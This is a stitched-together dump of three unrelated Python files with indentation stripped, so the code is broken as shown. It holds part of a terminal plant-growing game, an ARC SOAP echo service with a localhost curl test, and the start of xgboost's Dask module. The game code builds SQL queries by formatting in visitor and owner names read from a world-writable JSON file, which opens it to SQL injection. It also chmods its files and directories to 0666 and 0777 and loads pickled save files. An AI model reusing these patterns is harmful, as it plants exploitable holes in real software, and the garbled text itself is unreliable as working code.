if not hasattr(self, 'visitors'):
self.visitors = []
def parse_plant(self):
# Converts plant data to human-readable format
output = ""
if self.stage >= 3:
output += self.rarity_list[self.rarity] + " "
if self.mutation != 0:
output += self.mutation_list[self.mutation] + " "
if self.stage >= 4:
output += self.color_list[self.color] + " "
output += self.stage_list[self.stage] + " "
if self.stage >= 2:
output += self.species_list[self.species] + " "
return output.strip()
def rarity_check(self):
# Generate plant rarity
CONST_RARITY_MAX = 256.0
rare_seed = random.randint(1,CONST_RARITY_MAX)
common_range = round((2/3)*CONST_RARITY_MAX)
uncommon_range = round((2/3)*(CONST_RARITY_MAX-common_range))
rare_range = round((2/3)*(CONST_RARITY_MAX-common_range-uncommon_range))
legendary_range = round((2/3)*(CONST_RARITY_MAX-common_range-uncommon_range-rare_range))
common_max = common_range
uncommon_max = common_max + uncommon_range
rare_max = uncommon_max + rare_range
legendary_max = rare_max + legendary_range
godly_max = CONST_RARITY_MAX
if 0 <= rare_seed <= common_max:
rarity = 0
elif common_max < rare_seed <= uncommon_max:
rarity = 1
elif uncommon_max < rare_seed <= rare_max:
rarity = 2
elif rare_max < rare_seed <= legendary_max:
rarity = 3
elif legendary_max < rare_seed <= godly_max:
rarity = 4
return rarity
def dead_check(self):
# if it has been >5 days since watering, sorry plant is dead :(
time_delta_watered = int(time.time()) - self.watered_timestamp
if time_delta_watered > (5 * (24 * 3600)):
self.dead = True
return self.dead
def update_visitor_db(self, visitor_names):
game_dir = os.path.dirname(os.path.realpath(__file__))
garden_db_path = os.path.join(game_dir, 'sqlite/garden_db.sqlite')
conn = sqlite3.connect(garden_db_path)
for name in (visitor_names):
c = conn.cursor()
c.execute("SELECT * FROM visitors WHERE garden_name = '{}' AND visitor_name = '{}' ".format(self.owner, name))
data=c.fetchone()
if data is None:
sql = """ INSERT INTO visitors (garden_name,visitor_name,weekly_visits) VALUES('{}', '{}',1)""".format(self.owner, name)
c.execute(sql)
else:
sql = """ UPDATE visitors SET weekly_visits = weekly_visits + 1 WHERE garden_name = '{}' AND visitor_name = '{}'""".format(self.owner, name)
c.execute(sql)
conn.commit()
conn.close()
def guest_check(self):
user_dir = os.path.expanduser("~")
botany_dir = os.path.join(user_dir,'.botany')
visitor_filepath = os.path.join(botany_dir,'visitors.json')
guest_timestamps = []
visitors_this_check = []
if os.path.isfile(visitor_filepath):
with open(visitor_filepath, 'r') as visitor_file:
data = json.load(visitor_file)
if data:
for element in data:
if element['user'] not in self.visitors:
self.visitors.append(element['user'])
if element['user'] not in visitors_this_check:
visitors_this_check.append(element['user'])
# prevent users from manually setting watered_time in the future
if element['timestamp'] <= int(time.time()):
guest_timestamps.append(element['timestamp'])
try:
self.update_visitor_db(visitors_this_check)
except:
pass
with open(visitor_filepath, 'w') as visitor_file:
visitor_file.write('[]')
else:
with open(visitor_filepath, mode='w') as f:
json.dump([], f)
os.chmod(visitor_filepath, 0666)
if not guest_timestamps:
return self.watered_timestamp
all_timestamps = [self.watered_timestamp] + guest_timestamps
all_timestamps.sort()
# calculate # of days between each guest watering
timestamp_diffs = [(j-i)/86400.0 for i, j in zip(all_timestamps[:-1], all_timestamps[1:])]
# plant's latest timestamp should be set to last timestamp before a
# gap of 5 days
last_valid_element = next((x for x in timestamp_diffs if x > 5), None)
if not last_valid_element:
# all timestamps are within a 5 day range, can just use latest one
return all_timestamps[-1]
last_valid_index = timestamp_diffs.index(last_valid_element)
# slice list to only include up until a >5 day gap
valid_timestamps = all_timestamps[:last_valid_index + 1]
return valid_timestamps[-1]
def water_check(self):
self.watered_timestamp = self.guest_check()
self.time_delta_watered = int(time.time()) - self.watered_timestamp
if self.time_delta_watered <= (24 * 3600):
if not self.watered_24h:
self.watered_24h = True
return True
else:
self.watered_24h = False
return False
def mutate_check(self):
# Create plant mutation
# Increase this # to make mutation rarer (chance 1 out of x each second)
CONST_MUTATION_RARITY = 20000
mutation_seed = random.randint(1,CONST_MUTATION_RARITY)
if mutation_seed == CONST_MUTATION_RARITY:
# mutation gained!
mutation = random.randint(0,len(self.mutation_list)-1)
if self.mutation == 0:
self.mutation = mutation
return True
else:
return False
def growth(self):
# Increase plant growth stage
if self.stage < (len(self.stage_list)-1):
self.stage += 1
def water(self):
# Increase plant growth stage
if not self.dead:
self.watered_timestamp = int(time.time())
self.watered_24h = True
def start_over(self):
# After plant reaches final stage, given option to restart
# increment generation only if previous stage is final stage and plant
# is alive
if not self.dead:
next_generation = self.generation + 1
else:
# Should this reset to 1? Seems unfair.. for now generations will
# persist through death.
next_generation = self.generation
self.write_lock = True
self.kill_plant()
while self.write_lock:
# Wait for garden writer to unlock
# garden db needs to update before allowing the user to reset
pass
if not self.write_lock:
self.__init__(self.file_name, next_generation)
def kill_plant(self):
self.dead = True
def unlock_new_creation(self):
self.write_lock = False
def start_life(self):
# runs life on a thread
thread = threading.Thread(target=self.life, args=())
thread.daemon = True
thread.start()
def life(self):
# I've created life :)
while True:
if not self.dead:
if self.watered_24h:
self.ticks += 1
if self.stage < len(self.stage_list)-1:
if self.ticks >= self.life_stages[self.stage]:
self.growth()
if self.mutate_check():
pass
if self.water_check():
# Do something
pass
if self.dead_check():
# Do something else
pass
# TODO: event check
generation_bonus = 0.2 * (self.generation - 1)
adjusted_sleep_time = 1 / (1 + generation_bonus)
time.sleep(adjusted_sleep_time)
class DataManager(object):
# handles user data, puts a .botany dir in user's home dir (OSX/Linux)
# handles shared data with sqlite db
# TODO: .dat save should only happen on mutation, water, death, exit,
# harvest, otherwise
# data hasn't changed...
# can write json whenever bc this isn't ever read for data within botany
user_dir = os.path.expanduser("~")
botany_dir = os.path.join(user_dir,'.botany')
game_dir = os.path.dirname(os.path.realpath(__file__))
this_user = getpass.getuser()
savefile_name = this_user + '_plant.dat'
savefile_path = os.path.join(botany_dir, savefile_name)
#set this.savefile_path to guest_garden path
garden_db_path = os.path.join(game_dir, 'sqlite/garden_db.sqlite')
garden_json_path = os.path.join(game_dir, 'garden_file.json')
harvest_file_path = os.path.join(botany_dir, 'harvest_file.dat')
harvest_json_path = os.path.join(botany_dir, 'harvest_file.json')
def __init__(self):
self.this_user = getpass.getuser()
# check if instance is already running
# check for .botany dir in home
try:
os.makedirs(self.botany_dir)
except OSError as exception:
if exception.errno != errno.EEXIST:
raise
self.savefile_name = self.this_user + '_plant.dat'
def check_plant(self):
# check for existing save file
if os.path.isfile(self.savefile_path):
return True
else:
return False
def start_threads(self,this_plant):
# creates threads to save files every minute
death_check_thread = threading.Thread(target=self.death_check_update, args=(this_plant,))
death_check_thread.daemon = True
death_check_thread.start()
autosave_thread = threading.Thread(target=self.autosave, args=(this_plant,))
autosave_thread.daemon = True
autosave_thread.start()
def death_check_update(self,this_plant):
# .1 second updates and lock to minimize race condition
while True:
is_dead = this_plant.dead_check()
if is_dead:
self.save_plant(this_plant)
self.data_write_json(this_plant)
self.update_garden_db(this_plant)
self.harvest_plant(this_plant)
this_plant.unlock_new_creation()
time.sleep(.1)
def autosave(self, this_plant):
# running on thread, saves plant every 5s TODO: this is unnecessary
# and breaks shit probably
file_update_count = 0
while True:
file_update_count += 1
self.save_plant(this_plant)
self.data_write_json(this_plant)
self.update_garden_db(this_plant)
if file_update_count == 12:
# only update garden json every 60s
self.update_garden_json()
time.sleep(5)
file_update_count %= 12
def load_plant(self):
# load savefile
with open(self.savefile_path, 'rb') as f:
this_plant = pickle.load(f)
# migrate data structure to create data for empty/nonexistent plant
# properties
this_plant.migrate_properties()
# get status since last login
is_watered = this_plant.water_check()
is_dead = this_plant.dead_check()
if not is_dead:
if is_watered:
time_delta_last = int(time.time()) - this_plant.last_time
ticks_to_add = min(time_delta_last, 24*3600)
this_plant.time_delta_watered = 0
self.last_water_gain = time.time()
else:
ticks_to_add = 0
this_plant.ticks += ticks_to_add * (0.2 * (this_plant.generation - 1) + 1)
return this_plant
def plant_age_convert(self,this_plant):
# human-readable plant age
age_seconds = int(time.time()) - this_plant.start_time
days, age_seconds = divmod(age_seconds, 24 * 60 * 60)
hours, age_seconds = divmod(age_seconds, 60 * 60)
minutes, age_seconds = divmod(age_seconds, 60)
age_formatted = ("%dd:%dh:%dm:%ds" % (days, hours, minutes, age_seconds))
return age_formatted
def init_database(self):
# check if dir exists, create sqlite directory and set OS permissions to 777
sqlite_dir_path = os.path.join(self.game_dir,'sqlite')
if not os.path.exists(sqlite_dir_path):
os.makedirs(sqlite_dir_path)
os.chmod(sqlite_dir_path, 0777)
conn = sqlite3.connect(self.garden_db_path)
init_table_string = """CREATE TABLE IF NOT EXISTS garden (
plant_id tinytext PRIMARY KEY,
owner text,
description text,
age text,
score integer,
is_dead numeric
)"""
c = conn.cursor()
c.execute(init_table_string)
conn.close()
# init only, creates and sets permissions for garden db and json
if os.stat(self.garden_db_path).st_uid == os.getuid():
os.chmod(self.garden_db_path, 0666)
open(self.garden_json_path, 'a').close()
os.chmod(self.garden_json_path, 0666)
def migrate_database(self):
conn = sqlite3.connect(self.garden_db_path)
migrate_table_string = """CREATE TABLE IF NOT EXISTS visitors (
id integer PRIMARY KEY,
garden_name text,
visitor_name text,
weekly_visits integer
)"""
c = conn.cursor()
c.execute(migrate_table_string)
conn.close()
return True
def update_garden_db(self, this_plant):
# insert or update this plant id's entry in DB
# TODO: make sure other instances of user are deleted
# Could create a clean db function
self.init_database()
self.migrate_database()
age_formatted = self.plant_age_convert(this_plant)
conn = sqlite3.connect(self.garden_db_path)
c = conn.cursor()
# try to insert or replace
update_query = """INSERT OR REPLACE INTO garden (
plant_id, owner, description, age, score, is_dead
) VALUES (
'{pid}', '{pown}', '{pdes}', '{page}', {psco}, {pdead}
)
""".format(pid = this_plant.plant_id,
pown = this_plant.owner,
pdes = this_plant.parse_plant(),
page = age_formatted,
psco = str(this_plant.ticks),
pdead = int(this_plant.dead))
c.execute(update_query)
conn.commit()
conn.close()
def retrieve_garden_from_db(self):
# Builds a dict of dicts from garden sqlite db
garden_dict = {}
conn = sqlite3.connect(self.garden_db_path)
# Need to allow write permissions by others
conn.row_factory = sqlite3.Row
c = conn.cursor()
c.execute('SELECT * FROM garden ORDER BY owner')
tuple_list = c.fetchall()
conn.close()
# Building dict from table rows
for item in tuple_list:
garden_dict[item[0]] = {
"owner":item[1],
"description":item[2],
"age":item[3],
"score":item[4],
"dead":item[5],
}
return garden_dict
def update_garden_json(self):
this_garden = self.retrieve_garden_from_db()
with open(self.garden_json_path, 'w') as outfile:
json.dump(this_garden, outfile)
pass
def save_plant(self, this_plant):
# create savefile
this_plant.last_time = int(time.time())
temp_path = self.savefile_path + ".temp"
with open(temp_path, 'wb') as f:
pickle.dump(this_plant, f, protocol=2)
os.rename(temp_path, self.savefile_path)
def data_write_json(self, this_plant):
# create personal json file for user to use outside of the game (website?)
json_file = os.path.join(self.botany_dir,self.this_user + '_plant_data.json')
# also updates age
age_formatted = self.plant_age_convert(this_plant)
plant_info = {
"owner":this_plant.owner,
"description":this_plant.parse_plant(),
"age":age_formatted,
"score":this_plant.ticks,
"is_dead":this_plant.dead,
"last_watered":this_plant.watered_timestamp,
"file_name":this_plant.file_name,
"stage": this_plant.stage_list[this_plant.stage],
"generation": this_plant.generation,
}
if this_plant.stage >= 3:
plant_info["rarity"] = this_plant.rarity_list[this_plant.rarity]
if this_plant.mutation != 0:
plant_info["mutation"] = this_plant.mutation_list[this_plant.mutation]
if this_plant.stage >= 4:
plant_info["color"] = this_plant.color_list[this_plant.color]
if this_plant.stage >= 2:
plant_info["species"] = this_plant.species_list[this_plant.species]
with open(json_file, 'w') as outfile:
json.dump(plant_info, outfile)
def harvest_plant(self, this_plant):
# TODO: plant history feature - could just use a sqlite query to retrieve all of user's dead plants
# harvest is a dict of dicts
# harvest contains one entry for each plant id
age_formatted = self.plant_age_convert(this_plant)
this_plant_id = this_plant.plant_id
plant_info = {
"description":this_plant.parse_plant(),
"age":age_formatted,
"score":this_plant.ticks,
}
if os.path.isfile(self.harvest_file_path):
# harvest file exists: load data
with open(self.harvest_file_path, 'rb') as f:
this_harvest = pickle.load(f)
new_file_check = False
else:
this_harvest = {}
new_file_check = True
this_harvest[this_plant_id] = plant_info
# dump harvest file
temp_path = self.harvest_file_path + ".temp"
with open(temp_path, 'wb') as f:
pickle.dump(this_harvest, f, protocol=2)
os.rename(temp_path, self.harvest_file_path)
# dump json file
with open(self.harvest_json_path, 'w') as outfile:
json.dump(this_harvest, outfile)
return new_file_check
if __name__ == '__main__':
my_data = DataManager()
# if plant save file exists
if my_data.check_plant():
my_plant = my_data.load_plant()
# otherwise create new plant
else:
my_plant = Plant(my_data.savefile_path)
my_data.data_write_json(my_plant)
# my_plant is either a fresh plant or an existing plant at this point
my_plant.start_life()
my_data.start_threads(my_plant)
try:
botany_menu = CursedMenu(my_plant,my_data)
my_data.save_plant(my_plant)
my_data.data_write_json(my_plant)
my_data.update_garden_db(my_plant)
finally:
cleanup()
|
EchoService.py | import arc
import time
logger = arc.Logger(arc.Logger_getRootLogger(), 'EchoService.py')
wsrf_rp_ns = "http://docs.oasis-open.org/wsrf/rp-2"
echo_ns = "http://www.nordugrid.org/schemas/echo"
import threading
class EchoService(object):
def __init__(self, cfg):
logger.msg(arc.INFO, "EchoService (python) constructor called")
# get the response-prefix from the config XML
self.prefix = str(cfg.Get('prefix'))
# get the response-suffix from the config XML
self.suffix = str(cfg.Get('suffix'))
logger.msg(arc.DEBUG, "EchoService (python) has prefix %(prefix)s and suffix %(suffix)s" % {'prefix': self.prefix, 'suffix': self.suffix})
self.ssl_config = self.parse_ssl_config(cfg)
thread_test = str(cfg.Get('ThreadTest'))
if thread_test:
threading.Thread(target = self.infinite, args=[thread_test]).start()
def __del__(self):
logger.msg(arc.INFO, "EchoService (python) destructor called")
def parse_ssl_config(self, cfg):
try:
client_ssl_node = cfg.Get('ClientSSLConfig')
fromFile = str(client_ssl_node.Attribute('FromFile'))
if fromFile:
try:
xml_string = file(fromFile).read()
client_ssl_node = arc.XMLNode(xml_string)
except:
log.msg()
pass
if client_ssl_node.Size() == 0:
return {}
ssl_config = {}
ssl_config['key_file'] = str(client_ssl_node.Get('KeyPath'))
ssl_config['cert_file'] = str(client_ssl_node.Get('CertificatePath'))
ca_file = str(client_ssl_node.Get('CACertificatePath'))
if ca_file:
ssl_config['ca_file'] = ca_file
else:
ssl_config['ca_dir'] = str(client_ssl_node.Get('CACertificatesDir'))
return ssl_config
except:
import traceback
logger.msg(arc.ERROR, traceback.format_exc())
return {}
def infinite(self, url):
logger.msg(arc.INFO, "EchoService (python) thread test starting")
i = 0
while True:
try:
i += 1
cfg = arc.MCCConfig()
s = arc.ClientSOAP(cfg, arc.URL(url))
ns = arc.NS('echo', echo_ns)
outpayload = arc.PayloadSOAP(ns)
outpayload.NewChild('echo:echo').NewChild('echo:say').Set('hi!')
resp, status = s.process(outpayload)
logger.msg(arc.INFO, "EchoService (python) thread test, iteration %(iteration)s %(status)s" % {'iteration': i, 'status': status})
time.sleep(3)
except Exception as e:
import traceback
logger.msg(arc.DEBUG, traceback.format_exc())
def GetLocalInformation(self):
ns = arc.NS({'':'http://schemas.ogf.org/glue/2008/05/spec_2.0_d41_r01'})
info = arc.XMLNode(ns,'Domains')
service_node = info.NewChild('AdminDomain').NewChild('Services').NewChild('Service')
service_node.NewChild('Type').Set('org.nordugrid.tests.echo_python')
endpoint_node = service_node.NewChild('Endpoint')
endpoint_node.NewChild('HealthState').Set('ok')
endpoint_node.NewChild('ServingState').Set('production')
return info
def process(self, inmsg, outmsg):
logger.msg(arc.DEBUG, "EchoService (python) 'Process' called")
# time.sleep(10)
# get the payload from the message
inpayload = inmsg.Payload()
logger.msg(arc.VERBOSE, 'inmsg.Auth().Export(arc.SecAttr.ARCAuth) = %s' % inmsg.Auth().Export(arc.SecAttr.ARCAuth).GetXML())
logger.msg(arc.VERBOSE, 'inmsg.Attributes().getAll() = %s ' % inmsg.Attributes().getAll())
logger.msg(arc.INFO, "EchoService (python) got: %s " % inpayload.GetXML())
# the first child of the payload should be the name of the request
request_node = inpayload.Child()
# get the namespace
request_namespace = request_node.Namespace()
logger.msg(arc.DEBUG, "EchoService (python) request_namespace: %s" % request_namespace)
if request_namespace != echo_ns:
if request_namespace == wsrf_rp_ns:
outpayload = arc.PayloadSOAP(arc.NS({'wsrf-rp':wsrf_rp_ns}))
outpayload.NewChild('wsrf-rp:GetResourcePropertyDocumentResponse').NewChild(self.GetLocalInformation())
outmsg.Payload(outpayload)
logger.msg(arc.DEBUG, "outpayload %s" % outpayload.GetXML())
return arc.MCC_Status(arc.STATUS_OK)
raise Exception('wrong namespace. expected: %s' % echo_ns)
# get the name of the request without the namespace prefix
# this is the name of the Body node's first child
request_name = request_node.Name()
# create an answer payload
ns = arc.NS({'echo': echo_ns})
outpayload = arc.PayloadSOAP(ns)
# here we defined that 'echo' prefix will be the namespace prefix of 'http://www.nordugrid.org/schemas/echo'
# get the message
say = str(request_node.Get('say'))
# put it between the response-prefix and the response-suffix
hear = self.prefix + say + self.suffix
if request_name == 'double':
# if the name of the request is 'double'
# we create a new echo message which we send to http://localhost:60000/Echo using the ClientSOAP object
cfg = arc.MCCConfig()
ssl = False
if self.ssl_config:
cfg.AddCertificate(self.ssl_config.get('cert_file', None))
cfg.AddPrivateKey(self.ssl_config.get('key_file', None))
if 'ca_file' in self.ssl_config:
cfg.AddCAFile(self.ssl_config.get('ca_file', None))
else:
cfg.AddCADir(self.ssl_config.get('ca_dir', None))
ssl = True
if ssl:
url = arc.URL('https://localhost:60000/Echo')
logger.msg(arc.DEBUG, 'Calling https://localhost:60000/Echo using ClientSOAP')
else:
url = arc.URL('http://localhost:60000/Echo')
logger.msg(arc.DEBUG, 'Calling http://localhost:60000/Echo using ClientSOAP')
# creating the ClientSOAP object
s = arc.ClientSOAP(cfg, url)
new_payload = arc.PayloadSOAP(ns)
# creating the message
new_payload.NewChild('echo:echo').NewChild('echo:say').Set(hear)
logger.msg(arc.DEBUG, 'new_payload %s' % new_payload.GetXML())
# sending the message
resp, status = s.process(new_payload)
# get the response
hear = str(resp.Get('echoResponse').Get('hear'))
elif request_name == 'httplib':
# if the name of the request is 'httplib'
# we create a new echo message which we send to http://localhost:60000/echo using python's built-in http client
try:
import http.client as httplib
except ImportError:
import httplib
logger.msg(arc.DEBUG, 'Calling http://localhost:60000/Echo using httplib')
# create the connection
h = httplib.HTTPConnection('localhost', 60000)
new_payload = arc.PayloadSOAP(ns)
# create the message
new_payload.NewChild('echo:echo').NewChild('echo:say').Set(hear)
logger.msg(arc.DEBUG, 'new_payload %s' % new_payload.GetXML())
# send the message
h.request('POST', '/Echo', new_payload.GetXML())
r = h.getresponse()
response = r.read()
logger.msg(arc.DEBUG, response)
resp = arc.XMLNode(response)
# get the response
hear = str(resp.Child().Get('echoResponse').Get('hear'))
elif request_name == 'wait':
logger.msg(arc.DEBUG, 'Start waiting 10 sec...')
time.sleep(10)
logger.msg(arc.DEBUG, 'Waiting ends.')
# we create a node at '/echo:echoResponse/echo:hear' and put the string in it
outpayload.NewChild('echo:echoResponse').NewChild('echo:hear').Set(hear)
outmsg.Payload(outpayload)
logger.msg(arc.DEBUG, "outpayload %s" % outpayload.GetXML())
# return with STATUS_OK
return arc.MCC_Status(arc.STATUS_OK)
# you can easily test this with this shellscript:
"""
MESSAGE='<?xml version="1.0"?><soap-env:Envelope xmlns:soap-enc="http://schemas.xmlsoap.org/soap/encoding/" xmlns:soap-env="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:star="http://www.nordugrid.org/schemas/echo"><soap-env:Body><star:echo><star:say>HELLO</star:say></star:echo></soap-env:Body></soap-env:Envelope>'
echo Request:
echo $MESSAGE
echo
echo Response:
curl -d "$MESSAGE" http://localhost:60000/Echo
echo
"""
#
|
dask.py | # pylint: disable=too-many-arguments, too-many-locals, no-name-in-module
# pylint: disable=missing-class-docstring, invalid-name
# pylint: disable=too-many-lines, fixme
# pylint: disable=too-few-public-methods
# pylint: disable=import-error
"""Dask extensions for distributed training. See
https://xgboost.readthedocs.io/en/latest/tutorials/dask.html for simple
tutorial. Also xgboost/demo/dask for some examples.
There are two sets of APIs in this module, one is the functional API including
``train`` and ``predict`` methods. Another is stateful Scikit-Learner wrapper
inherited from single-node Scikit-Learn interface.
The implementation is heavily influenced by dask_xgboost:
https://github.com/dask/dask-xgboost
"""
import platform
import logging
from collections import defaultdict
from collections.abc import Sequence
from threading import Thread
from typing import TYPE_CHECKING, List, Tuple, Callable, Optional, Any, Union, Dict, Set
from typing import Awaitable, Generator, TypeVar
import numpy
from . import rabit, config
from .callback import TrainingCallback
from .compat import LazyLoader
from .compat import sparse, scipy_sparse
from .compat import PANDAS_INSTALLED, DataFrame, Series, pandas_concat
from .compat import lazy_isinstance
from .core import DMatrix, DeviceQuantileDMatrix, Booster, _expect, DataIter
from .core import Objective, Metric
from .core import _deprecate_positional_args
from .training import train as worker_train
from .tracker import RabitTracker, get_host_ip
from .sklearn import XGBModel, XGBClassifier, XGBRegressorBase, XGBClassifierBase
from .sklearn import _wrap_evaluation_matrices, _objective_decorator
from .sklearn import XGBRankerMixIn
from .sklearn import xgboost_model_doc
from .sklearn import _cls_predict_proba
from .sklearn import XGBRanker
if TYPE_CHECKING:
from dask import dataframe as dd
from dask import array as da
import dask
import distributed
else:
dd = LazyLoader('dd', globals(), 'dask.dataframe')
da = LazyLoader('da', globals(), 'dask.array')
dask = LazyLoader('dask', globals(), 'dask')
distributed = LazyLoader('distributed', globals(), 'dask.distributed')
_DaskCollection = Union["da.Array", "dd.DataFrame", "dd.Series"]
try:
from mypy_extensions import TypedDict
TrainReturnT = TypedDict('TrainReturnT', {
'booster': Booster,
'history': Dict,
})
except ImportError:
TrainReturnT = Dict[str, Any] # type:ignore
# TODOs:
# - CV
#
# Note for developers:
#
# As of writing asyncio is still a new feature of Python and in depth documentation is
# rare. Best examples of various asyncio tricks are in dask (luckily). Classes like
# Client, Worker are awaitable. Some general rules for the implementation here:
#
# - Synchronous world is different from asynchronous one, and they don't mix well.
# - Write everything with async, then use distributed Client sync function to do the
# switch.
# - Use Any for type hint when the return value can be union of Awaitable and plain
# value. This is caused by Client.sync can return both types depending on context.
# Right now there's no good way to silent:
#
# await train(...)
#
# if train returns an Union type.
LOGGER = logging.getLogger('[xgboost.dask]')
def _start_tracker(n_workers: int) -> Dict[str, Any]:
"""Start Rabit tracker """
env = {'DMLC_NUM_WORKER': n_workers}
host = get_host_ip('auto')
rabit_context = RabitTracker(hostIP=host, nslave=n_workers)
env.update(rabit_context.slave_envs())
rabit_context.start(n_workers)
thread = Thread(target=rabit_context.join)
thread.daemon = True
thread.start()
return env
def _assert_dask_support() -> None:
try:
import dask # pylint: disable=W0621,W0611
except ImportError as e:
raise ImportError(
"Dask needs to be installed in order to use this module"
) from e
if platform.system() == "Windows":
msg = "Windows is not officially supported for dask/xgboost,"
msg += " contribution are welcomed."
LOGGER.warning(msg)
class RabitContext:
'''A context controling rabit initialization and finalization.'''
def __init__(self, args: List[bytes]) -> None:
self.args = args
worker = distributed.get_worker()
self.args.append(
('DMLC_TASK_ID=[xgboost.dask]:' + str(worker.address)).encode())
def __enter__(self) -> None:
rabit.init(self.args)
LOGGER.debug('-------------- rabit say hello ------------------')
def __exit__(self, *args: List) -> None:
rabit.finalize()
LOGGER.debug('--------------- rabit say bye ------------------')
def concat(value: Any) -> Any: # pylint: disable=too-many-return-statements
'''To be replaced with dask builtin.'''
if isinstance(value[0], numpy.ndarray):
return numpy.concatenate(value, axis=0)
if scipy_sparse and isinstance(value[0], scipy_sparse.spmatrix):
return scipy_sparse.vstack(value, format='csr')
if sparse and isinstance(value[0], sparse.SparseArray):
return sparse.concatenate(value, axis=0)
if PANDAS_INSTALLED and isinstance(value[0], (DataFrame, Series)):
return pandas_concat(value, axis=0)
if lazy_isinstance(value[0], 'cudf.core.dataframe', 'DataFrame') or \
lazy_isinstance(value[0], 'cudf.core.series', 'Series'):
from cudf import concat as CUDF_concat # pylint: disable=import-error
return CUDF_concat(value, axis=0)
if lazy_isinstance(value[0], 'cupy.core.core', 'ndarray'):
import cupy
# pylint: disable=c-extension-no-member,no-member
d = cupy.cuda.runtime.getDevice()
for v in value:
d_v = v.device.id
assert d_v == d, 'Concatenating arrays on different devices.'
return cupy.concatenate(value, axis=0)
return dd.multi.concat(list(value), axis=0)
def _xgb_get_client(client: Optional["distributed.Client"]) -> "distributed.Client":
'''Simple wrapper around testing None.'''
if not isinstance(client, (type(distributed.get_client()), type(None))):
raise TypeError(
_expect([type(distributed.get_client()), type(None)], type(client)))
ret = distributed.get_client() if client is None else client
return ret
# From the implementation point of view, DaskDMatrix complicates a lots of
# things. A large portion of the code base is about syncing and extracting
# stuffs from DaskDMatrix. But having an independent data structure gives us a
# chance to perform some specialized optimizations, like building histogram
# index directly.
class DaskDMatrix:
# pylint: disable=missing-docstring, too-many-instance-attributes
'''DMatrix holding on references to Dask DataFrame or Dask Array. Constructing a
`DaskDMatrix` forces all lazy computation to be carried out. Wait for the input data
explicitly if you want to see actual computation of constructing `DaskDMatrix`.
See doc for :py:obj:`xgboost.DMatrix` constructor for other parameters. DaskDMatrix
accepts only dask collection.
.. note::
DaskDMatrix does not repartition or move data between workers. It's
the caller's responsibility to balance the data.
.. versionadded:: 1.0.0
Parameters
----------
client :
Specify the dask client used for training. Use default client returned from dask
if it's set to None.
'''
@_deprecate_positional_args
def __init__(
self,
client: "distributed.Client",
data: _DaskCollection,
label: Optional[_DaskCollection] = None,
*,
weight: Optional[_DaskCollection] = None,
base_margin: Optional[_DaskCollection] = None,
missing: float = None,
silent: bool = False, # pylint: disable=unused-argument
feature_names: Optional[Union[str, List[str]]] = None,
feature_types: Optional[Union[Any, List[Any]]] = None,
group: Optional[_DaskCollection] = None,
qid: Optional[_DaskCollection] = None,
label_lower_bound: Optional[_DaskCollection] = None,
label_upper_bound: Optional[_DaskCollection] = None,
feature_weights: Optional[_DaskCollection] = None,
enable_categorical: bool = False
) -> None:
_assert_dask_support()
client = _xgb_get_client(client)
self.feature_names = feature_names
self.feature_types = feature_types
self.missing = missing
if qid is not None and weight is not None:
raise NotImplementedError("per-group weight is not implemented.")
if group is not None:
raise NotImplementedError(
"group structure is not implemented, use qid instead."
)
if enable_categorical:
raise NotImplementedError(
"categorical support is not enabled on `DaskDMatrix`."
)
if len(data.shape) != 2:
raise ValueError(
"Expecting 2 dimensional input, got: {shape}".format(shape=data.shape)
)
if not isinstance(data, (dd.DataFrame, da.Array)):
raise TypeError(_expect((dd.DataFrame, da.Array), type(data)))
if not isinstance(label, (dd.DataFrame, da.Array, dd.Series, type(None))):
raise TypeError(_expect((dd.DataFrame, da.Array, dd.Series), type(label)))
self._n_cols = data.shape[1]
assert isinstance(self._n_cols, int)
self.worker_map: Dict[str, "distributed.Future"] = defaultdict(list)
self.is_quantile: bool = False
self._init = client.sync(
self._map_local_data,
client,
data,
label=label,
weights=weight,
base_margin=base_margin,
qid=qid,
feature_weights=feature_weights,
label_lower_bound=label_lower_bound,
label_upper_bound=label_upper_bound,
)
def __await__(self) -> Generator:
return self._init.__await__()
async def _map_local_data(
self,
client: "distributed.Client",
data: _DaskCollection,
label: Optional[_DaskCollection] = None,
weights: Optional[_DaskCollection] = None,
base_margin: Optional[_DaskCollection] = None,
qid: Optional[_DaskCollection] = None,
feature_weights: Optional[_DaskCollection] = None,
label_lower_bound: Optional[_DaskCollection] = None,
label_upper_bound: Optional[_DaskCollection] = None
) -> "DaskDMatrix":
'''Obtain references to local data.'''
def inconsistent(
left: List[Any], left_name: str, right: List[Any], right_name: str
) -> str:
msg = 'Partitions between {a_name} and {b_name} are not ' \
'consistent: {a_len} != {b_len}. ' \
'Please try to repartition/rechunk your data.'.format(
a_name=left_name, b_name=right_name, a_len=len(left),
b_len=len(right)
)
return msg
def check_columns(parts: Any) -> None:
# x is required to be 2 dim in __init__
assert parts.ndim == 1 or parts.shape[1], 'Data should be' \
' partitioned by row. To avoid this specify the number' \
' of columns for your dask Array explicitly. e.g.' \
' chunks=(partition_size, X.shape[1])'
data = client.persist(data)
for meta in [label, weights, base_margin, label_lower_bound,
label_upper_bound]:
if meta is not None:
meta = client.persist(meta)
# Breaking data into partitions, a trick borrowed from dask_xgboost.
# `to_delayed` downgrades high-level objects into numpy or pandas
# equivalents.
X_parts = data.to_delayed()
if isinstance(X_parts, numpy.ndarray):
check_columns(X_parts)
X_parts = X_parts.flatten().tolist()
def flatten_meta(
meta: Optional[_DaskCollection]
) -> "Optional[List[dask.delayed.Delayed]]":
if meta is not None:
meta_parts = meta.to_delayed()
if isinstance(meta_parts, numpy.ndarray):
check_columns(meta_parts)
meta_parts = meta_parts.flatten().tolist()
return meta_parts
return None
y_parts = flatten_meta(label)
w_parts = flatten_meta(weights)
margin_parts = flatten_meta(base_margin)
qid_parts = flatten_meta(qid)
ll_parts = flatten_meta(label_lower_bound)
lu_parts = flatten_meta(label_upper_bound)
parts = [X_parts]
meta_names = []
def append_meta(
m_parts: Optional[List["dask.delayed.delayed"]], name: str
) -> None:
if m_parts is not None:
assert len(X_parts) == len(
m_parts), inconsistent(X_parts, 'X', m_parts, name)
parts.append(m_parts)
meta_names.append(name)
append_meta(y_parts, 'labels')
append_meta(w_parts, 'weights')
append_meta(margin_parts, 'base_margin')
append_meta(qid_parts, 'qid')
append_meta(ll_parts, 'label_lower_bound')
append_meta(lu_parts, 'label_upper_bound')
# At this point, `parts` looks like:
# [(x0, x1, ..), (y0, y1, ..), ..] in delayed form
# delay the zipped result
parts = list(map(dask.delayed, zip(*parts))) # pylint: disable=no-member
# At this point, the mental model should look like:
